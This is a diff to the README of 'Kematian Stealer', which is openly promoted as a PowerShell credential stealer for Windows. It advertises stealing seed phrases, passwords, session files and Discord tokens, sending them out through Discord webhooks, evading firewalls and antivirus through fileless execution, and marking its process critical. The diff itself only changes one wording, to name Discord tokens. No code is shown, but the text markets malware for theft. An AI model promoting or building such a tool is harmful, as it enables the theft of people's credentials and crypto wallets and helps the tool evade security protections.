opsec-bot/Kematian-Stealer/README.md

 <h1 align="center">Kematian Stealer</h1>

 # About The Project
 Kematian Stealer is a [PowerShell-based](https://learn.microsoft.com/en-us/powershell/scripting/overview?view=powershell-5.1) tool designed to effortlessly infiltrate and exfiltrate data from Windows systems.
 All information collected is sent using [Discord webhooks](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks).
 It functions seamlessly across any `x64bit` system, from `Windows 8 x64 to Windows 11 x64`, ensuring compatibility with the latest updates.
-With Kematian Stealer, you can retrieve `seed phrases, session files, passwords, application data, Discord information` and more.
+With Kematian Stealer, you can retrieve `seed phrases, session files, passwords, application data, Discord tokens` and more.

 This tool is particularly advantageous for accessing application and file data without restrictions, while evading conventional security measures such as `firewalls` and `antivirus` software, thanks to its `fileless capabilities`, which set it apart from other stealers.
 Upon execution, Kematian Stealer creates a `mutex` on the system and designates the process as `critical` before initiating data exfiltration, ensuring smooth and uninterrupted transmission of data.